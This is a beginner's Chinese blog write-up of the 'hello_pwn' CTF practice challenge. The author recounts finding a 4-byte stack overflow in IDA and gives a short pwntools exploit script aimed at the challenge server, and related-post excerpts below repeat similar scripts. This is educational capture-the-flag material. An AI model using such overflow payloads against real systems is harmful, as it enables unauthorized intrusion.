hello_pwn ---wp(新手菜鸟的自我反思)

最新推荐文章于 2024-07-26 15:25:27 发布
最新推荐文章于 2024-07-26 15:25:27 发布
阅读量462 收藏
点赞数
分类专栏: vmware相关知识 PWN学习笔记 文章标签: ubuntu pwn python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xindada559/article/details/117537082
版权

终于入坑了pwn,发现最简单的签到题都学不会,出现bug太多,比着大佬的方法做了,老是会出现问题,下面作为做这道题目中出现问题的自我反思:

    首先是点开题目(附件是64位滴,怎么知道他是多少位的,可以先用比如32位的IDA打开,界面上就会显示他是多少位的,然后关掉选择相应的位的exe文件运行),下载附件,这个文件是要拖到IDA中进行反汇编的,关于IDA的使用方法我目前还是小白,只会傻瓜式拖拽,点击一通后,按F5出现C语言形式的代码:

根据大佬们的操作过程,终于理解了,flag一般存在于if这样的条件语句中,因此我们的目的就是使程序进入到if里的代码,sub_400686()这里面应该就存有flag

下面就是满足if的条件:

双击dword_60106c 和 0x10nLL后,发现两个虚拟地址相差为 106C - 1068 = 4个地址单位,看大佬的代码:

from pwn import*
r=remote("111.198.29.45",44362)
#r=process('./hellopwn')
payload=4*'A'+p64(1853186401)
r.recvuntil("bof")
r.sendline(payload)
r.interactive()

大佬们的代码都大同小异,大多都是定义的变量(比如这里的r)不同。

在哪里写python的脚本呢?

我是在ubuntu里,使用的vim编写的,在命令行界面,输入: vim exp.py 就可以创建python文件,并进入编辑界面。把大佬的代码敲上,按下ESC,退出编辑shift+: 在下端会出现冒号,输入wq(就是保存修改并推出的意思,q!是不保存直接退出)

然后输入: python3 exc.py   运行该脚本

注意:这里如果直接输 python exc.py 可能会出现错误

ImportError: No module named pwn
但是如果前面都没有问题,也可能会出现bug,比如这样:

 payload ='A'*4 + p64(1853186401)
TypeError: can only concatenate str (not "bytes") to str

经过一番尝试和找资料后,终于解决:

再次进入python脚本代码,将出现错误的语句进行如下修改:

payload =b'A'*4 + p64(1853186401)

加一个b以后就可以不再出现错误了(我可真棒,哈哈)

 

努力努力更努力NA
关注
专栏目录
攻防世界pwn新手练习(hello_pwn
BurYiA的博客
10-24 3770
hello_pwn 拿到程序后,我们首先checksec一下 可以看到是64位程序,好的是这次只开了NX(堆栈不可执行),ok,我们跑一下程序看看 可以看到它是一个输入,然后就啥都没有了emmmm…好吧,咱们继续放到IDA里面看看 ...
[CTF-PWN]攻防世界新手村-hello_pwn[wp]
murongxuege的博客
10-01 2612
事件起因(无语) 手残博主因在27日从根地址误删了自己两年半配置和使用的kali虚拟机。。。在一步步恢复环境配置的时候,从头到尾刷一遍题,总结思路。 题目分析 开启场景后,服务端会开启对应的端口,并在端口上部署和附件相同的ELF二进制可执行文件,我们要做的就是下载附件并在本地进行反汇编,反编译等操作分析程序漏洞,从而利用漏洞获取题目的flag。 从描述中可以看出当前程序是要进行年龄的输入操作的,有输入操作,还是在新手村,那么大概率是gets()等C函数输入漏洞,进一步猜测是普通的内存地址覆盖的题。 che
hello_pwn
wuyvle的博客
01-23 414
hello_pwn 老惯例放进Linux康康 可见是个64位,且没有金丝雀(狂喜 ) 放进ida64康康 这有个read函数,进去康康 分析main函数 要使dword_60106C == 1853186401 才能得到flag 但我们只能给unk_601068赋值,怎么办? 这就用上栈溢出了,让我们再看看堆栈 两者之间差(ox6c-0x68)这之间数据填满;让unk_601068的值占到dword_60106C的位置 开始写脚本 比较简单 ...
攻防世界XCTF-Pwn入门11题解题报告
最新发布
HUANGXIN9898的博客
07-26 783
Pwn是CTF中至关重要的项目,一般来说都是Linux二进制题目,零基础的同学可以看《程序员的自我修养》,主要题型包括:缓冲区溢出、Return to Libc、格式化字符串、PLT GOT等。
[攻防世界 pwn]——hello_pwn
Y_peak的博客
02-18 332
[攻防世界 pwn]——hello_pwn15 题目地址: https://adworld.xctf.org.cn/ 题目: checksec IDA, 利用栈溢出修改dword_60106C就好距离为4 exploit from pwn import * #p = process("./pwn") p = remote("111.200.241.244",35304) payload = 'a'*4 + p64(0x6e756161) p.sendline(payload) p.inter
攻防世界-PWN-hello_pwn
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
09-24 514
开始进军PWN题 目录 分析 拖入IDA exp 分析 使用 file 和 checksec(查看程序的保护机制) 指令分析文件 x86-64 架构 Linux可执行文件ELF checksec参数 Arch 程序架构信息。这里是amd64-64的 RELRO 主要针对 GOT 改写的攻击方式的保护 RELRO为” Partial RELRO”,说明我们对GOT表具有写权限。 这里也没作保护 Stack 栈保护 这里没有启用 NX 栈没有执行权限 这里是打开的 PI.
hello pwn
Fiverya的博客
03-08 470
首先打开IDA,拖入程序 可以看到一个很简单的程序。 getshell函数如下: getshell 函数地址: 在hello函数处下断点: 调试到read处,确定溢出点。 payload如下: ...
初学pwn-攻防世界(hello_pwn)
天柱的博客
08-26 3499
初学pwn-writeUp 攻防世界的第二道题目,hello_pwn。 首先创建场景,使用nc进入远端,发现他只输出了一串字符串,没有别的内容,也无法使用ls查看它的文件。 下载场景提供的文件,使用cat查看,发现是ELF文件,按照大佬的流程,ELF文件直接用ida打开。 初次使用ida,深切的感受到了ida的强大。 打开之后,按F5,进行反编译,可以看到main函数的伪代码 可以从main函数中看到,这里存在一个判断,如果条件达成的话,会调用一个函数。点开函数看一下。 可以发现里边会输出flag.tx
【攻防世界pwn-hello_pwn
a_silly_coder的博客
01-16 1956
下载文件后,首先检查保护: 将文件拖入64位ida,查看代码 基本逻辑是:读取一个输入,存入unk_601068,接着比较dword_60106C是否等于一个预期的值,如果相等,执行对应函数,函数内直接执行cat flag.txt 所以思路就是需要覆盖dword_60106C,让其等于预期值,此时我们需要在输入unk_601068时,对dword_60106C进行覆盖,接着我们查看这两个值的存放位置。 发现这两个值之间相隔4个字节,所以需要4个字节的填充数据,接着输入预期值。..
Out_of_Hand__Attacks_Against_PHP_Environments-Powerful_PHP_Pwn_Primitives.pdf
08-08
当前web应用漏洞变得越来越复杂。对于这些流行网站和应用所用到的底层编程语言和框架的理解程度,对是否能够发现高危漏洞起到重要作用。本议题中,将会深入探讨PHP 7.4的一些最新feature,以及如何利用这些feature去...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
攻防世界 - pwn - hello_pwn
qq726232111的博客
03-16 1007
A、程序分析 1、缓冲区地址为601068h 2、判断条件 --> 60106Ch为起始地址 , 存储6E756161h 3、判断条件成立执行cat flag B、利用分析 1、601068h -60106Bh --> 4byte 填充数据 60106Ch - 60106Fh --> 4byte 判断条件 0x6E756161 ...
攻防世界 pwn 新手练习区 hello_pwn
ChaoYue_miku的博客
07-06 551
题目来源: NUAACTF 题目描述:pwn!,segment fault!菜鸡陷入了深思 ** 0、下载附件,使用checksec检查保护情况,尝试打开文件 ** 开启了NX部分RELRO ** 1、使用IDA 64 Pro打开文件 ** 查看main函数 发现了一个read函数,查看一下unk_601068的栈结构 这里是存在栈溢出的,只要覆盖4个字节的内容就可以更改dword_60106C的内容。 接着往后查看main函数: 有一个if条件判断,只要满足dword_60106C == 18531
攻防世界pwn新手练习区-hello_pwn
CSDN_sunrise的博客
08-28 759
hello_pwn查看基本信息并运行文件 查看基本信息并运行文件
hello_pwn(xctf)
weixin_43868725的博客
05-06 631
0x0 程序保护和流程 保护: 流程: subsub_400686(): 当dword_60106C = 1853186401 时进入subsub_400686()函数获得flag。 0x1 利用 仔细分析后可以发现 两个数据是相邻的,我们可以通过read函数改写dword_60106C的值从而获得flag。unk_601068和dword_60106C 只相差四个字节,read函数可以输...
攻防世界 hello_pwn
weixin_73399382的博客
06-30 393
然后从指针&unk_601068指定的缓冲区里面读取最多16位数据(0x10uLL解读:0x代表十六进制,uLL=unsigned long long,无符号long long 型,10转为十进制即为16)直接执行一下,这里看别人的wp是可以通过输入构造字符串来getshell的,我这里就不这么做了,多练写脚本的能力。国际惯例checksec一下,64位小端序,未开启栈溢出保护和地址随机化,很明显这道题利用栈溢出了。刚学pwn的小白,大家互相学习,看看哪里说得不对打在评论区!写脚本,下面两个略微差别。
攻防世界pwn刷题--hello_pwn
m0_74073577的博客
09-29 207
0x60106c-0x611068=4个字节,那么输入4个a就可以到达目标地址(python里b’a‘的长度是一个字节),再输入‘nuaa‘即可,需要注意的是checksec后是小端序,绝大部分题目都是小端序,所以数据高位应该在地址低位,即输入’aaun‘,总体的payload应该是aaaa+aaun,如果暂时无法理解这个亦可以使用pwntools工具,使用p64打包数据即可,这样的话payload应该是payload=b’a‘*4+p64(0x6E756161),这个0x6E。结果是‘nuaa’。
攻防世界-hello_pwn
qq_52333044的博客
06-22 263
第一种:通过先输入四给任意字符再输入"aaun" (为什么是aaun呢,因为小端序和大端序的问题,小端序低地址存低位,大端序就是低地址存高位,这里采用小端序)unk-601068和dword——60106C相差4 个字节,然后我们可以通过覆盖来改变dwod_60106c的赋值。发现当unk_601068等于nuaa时才能得到flag。习惯性的用ls没有什么用,然后查看是多少位。然后用64位IDA打开查看程序。用kali linux 打开。第二种:就直接写exp。
攻防世界pwn-forgot
08-10
很抱歉,但是我无法回答你的问题。我只能提供关于麦田怪圈的信息。123 #### 引用[.reference_title] - *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界:PWN刷题-forgot](https://blog.csdn.net/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值